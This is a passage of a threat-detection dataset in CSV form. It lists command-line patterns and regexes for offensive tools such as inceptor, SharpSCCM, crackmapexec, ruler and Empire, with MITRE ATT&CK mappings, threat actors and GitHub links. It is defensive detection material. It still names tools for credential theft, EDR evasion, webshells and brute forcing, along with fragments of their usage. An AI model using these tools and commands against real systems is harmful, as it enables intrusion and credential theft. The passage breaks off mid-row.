inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* inceptor.spec*",".{0,1000}\sinceptor\.spec.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --includeModules amass*",".{0,1000}\s\-\-includeModules\samass.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -InFile Wi-Fi-PASS*",".{0,1000}\s\-InFile\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* InflativeLoading.py*",".{0,1000}\sInflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "* informix-brute.nse*",".{0,1000}\sinformix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-query.nse*",".{0,1000}\sinformix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-tables.nse*",".{0,1000}\sinformix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Injector NtMapViewOfSection*",".{0,1000}\s\-Injector\sNtMapViewOfSection.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "* -Injector VirtualAllocEx*",".{0,1000}\s\-Injector\sVirtualAllocEx.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "* --input 10m_usernames.txt*",".{0,1000}\s\-\-input\s10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "* -InputPath .\TrustedForests.txt*",".{0,1000}\s\-InputPath\s\.\\TrustedForests\.txt.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "* --insecure brute --userpass *",".{0,1000}\s\-\-insecure\sbrute\s\-\-userpass\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* --insecure brute --users *",".{0,1000}\s\-\-insecure\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* instabf.py*",".{0,1000}\sinstabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "* instainsane.sh*",".{0,1000}\sinstainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "* install *masscan*",".{0,1000}\sinstall\s.{0,1000}masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "* install armitage*",".{0,1000}\sinstall\sarmitage.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "* install arsenal-cli*",".{0,1000}\sinstall\sarsenal\-cli.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* install autobloody*",".{0,1000}\sinstall\sautobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "* install backdoor-factory*",".{0,1000}\sinstall\sbackdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* install chisel*",".{0,1000}\sinstall\schisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "* install dnscrypt-proxy*",".{0,1000}\sinstall\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "* install evil-proxy*",".{0,1000}\sinstall\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "* install evil-winrm*",".{0,1000}\sinstall\sevil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* install github *merlin*",".{0,1000}\sinstall\sgithub\s.{0,1000}merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "* install gsocket*",".{0,1000}\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* install hekatomb*",".{0,1000}\sinstall\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "* install holehe*",".{0,1000}\sinstall\sholehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "* install iodine*",".{0,1000}\sinstall\siodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "* install krbjack*",".{0,1000}\sinstall\skrbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "* install nikto*",".{0,1000}\sinstall\snikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "* install samdump2*",".{0,1000}\sinstall\ssamdump2.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* install tor2web*",".{0,1000}\sinstall\stor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "* install wapiti3*",".{0,1000}\sinstall\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "* install wfuzz*",".{0,1000}\sinstall\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* install wordlists*",".{0,1000}\sinstall\swordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* install-sb.sh*",".{0,1000}\sinstall\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "* insTof.py*",".{0,1000}\sinsTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "* intel -d * -whois*",".{0,1000}\sintel\s\-d\s.{0,1000}\s\-whois.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* interact -u http*://*/*.aspx -p *",".{0,1000}\sinteract\s\-u\shttp.{0,1000}\:\/\/.{0,1000}\/.{0,1000}\.aspx\s\-p\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "* interactive_shell.py*",".{0,1000}\sinteractive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* --interface * --analyze --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --interface * --analyze --lm --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -Internalmonologue -Command *",".{0,1000}\s\-Internalmonologue\s\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* INTO LDAPHUNTERFINDINGS*",".{0,1000}\sINTO\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "* Inveigh-*",".{0,1000}\sInveigh\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* invoke query *FROM SMS_Admin*",".{0,1000}\sinvoke\squery\s.{0,1000}FROM\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* invoke_sessiongopher*",".{0,1000}\sinvoke_sessiongopher.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* invoke_vnc*",".{0,1000}\sinvoke_vnc.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* Invoke-ADSBackdoor.ps1*",".{0,1000}\sInvoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-DCOM.ps1*",".{0,1000}\sInvoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\sInvoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 